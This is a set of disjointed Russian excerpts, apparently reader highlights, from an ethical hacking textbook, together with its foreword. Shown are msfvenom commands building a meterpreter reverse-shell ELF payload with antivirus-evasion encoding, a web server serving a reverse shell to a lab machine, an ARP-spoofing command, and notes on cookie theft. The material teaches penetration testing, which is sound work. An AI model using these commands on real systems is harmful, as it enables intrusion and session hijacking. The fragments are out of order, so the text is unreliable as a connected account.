ближайший к вам сервер, после чего нажмите кнопку Download (Скачать) (рис. 1.3)
5 Ұнайды
Теперь запустите локальный сервер, который передаст файл reverseShell.py серверу Metasploitable:
kali@kali:~/Desktop/shell$ python3 -m http.server 8080
Элемент -m обозначает запускаемый модуль. В данном случае это модуль http.server, позволяющий запустить веб-сервер.
1 Ұнайды
msfvenom -a x86
➥--platform linux -p linux/x86/meterpreter/reverse_tcp LHOST=
➥<IP-адрес Kali> LPORT=8443 -b "\x00" -f elf -o malicious
kali@kali:~/Desktop/Malware$ sudo msfvenom -a x86 --platform linux -p linux/
➥ x86/meterpreter/reverse_tcp LHOST=<IP-адрес Kali> LPORT=443
➥ --smallest -i 4 -f elf -o malicious
Флаг -a обозначает целевую архитектуру, в данном случае это x86. Флаг --platform указывает целевую платформу, а флаг -p — тип полезной нагрузки, в данном случае это обратная TCP-оболочка, подобная той, которую мы реализовали в главе 4. Флаг --smallest генерирует минимально возможную полезную нагрузку. Флаг -i помогает обходить средства антивирусной защиты, о чем мы поговорим чуть позже. Флаг -f задает тип выходного файла. Мы выбрали формат elf, поскольку он используется исполняемыми файлами ОС Linux. (Формат exe используется исполняемыми файлами ОС Windows.) Флаг -o задает имя выходного файла.
Предисловие
В современном мире хакеры обладают беспрецедентным влиянием. Теперь взлом системы выборов, электросетей и других объектов инфраструктуры может непосредственно затронуть жизни миллионов людей.
В 2021 году с помощью программ-вымогателей хакеры вывели из строя крупнейший в США бензопровод. Это привело к росту общественного беспокойства, отмене рейсов и перебоям в снабжении. С последствиями этой атаки так или иначе столкнулось множество людей.
Учитывая столь высокий уровень влияния, нам необходимо не только обучать людей этичному хакингу, но и всячески его поощрять. Книга «Этичный хакинг» представляет собой отличное руководство для программистов, которые хотят познакомиться с основами разработки хакерских инструментов, а также освоить различные техники, используемые профессиональными пентестерами. В процессе изучения этой книги вам предстоит настроить лабораторию и выполнить множество упражнений, которые помогут вам овладеть необходимыми навыками.
В книге описывается широкий диапазон атак, начиная с мелких взломов в местном кафе и заканчивая крупномасштабным взломом корпоративной системы. Все это делает данное издание идеальным учебником для курса компьютерной безопасности на уровне бакалавриата или магистратуры. Я считаю, что эта книга абсолютно необходима нынешним и будущим профессионалам в области технологий, политики и лидерства.
Хорошо это или плохо, но хакерство уже никуда не денется.
Хуан Гилберт, профессор, стипендиат фонда семьи Бэнксов и глава Инженерного колледжа им. Герберта Вертхайма, Университет Флориды
sudo arpspoof -i eth0 -t 192.168.100.101 192.168.100.1
Это избавляет пользователей от необходимости авторизоваться в системе каждый раз, когда они выполняют на сайте то или иное действие. Веб-сервер проверяет подлинность HTTP-запросов, проверяя файл cookie, поэтому в случае его кражи злоумышленник сможет получить доступ к учетной записи жертвы, отправляя HTTP-запросы, содержащие соответствующее значение.
Ваш браузер сохраняет этот файл cookie и включает его во все будущие HTTP-запросы, отправляемые на веб-сервер
было сказано в главе 12, файл cookie представляет собой поле HTTP-запроса и ответа, которое браузер и веб-сервер используют для хранения значений и отслеживания состояния сеанса.
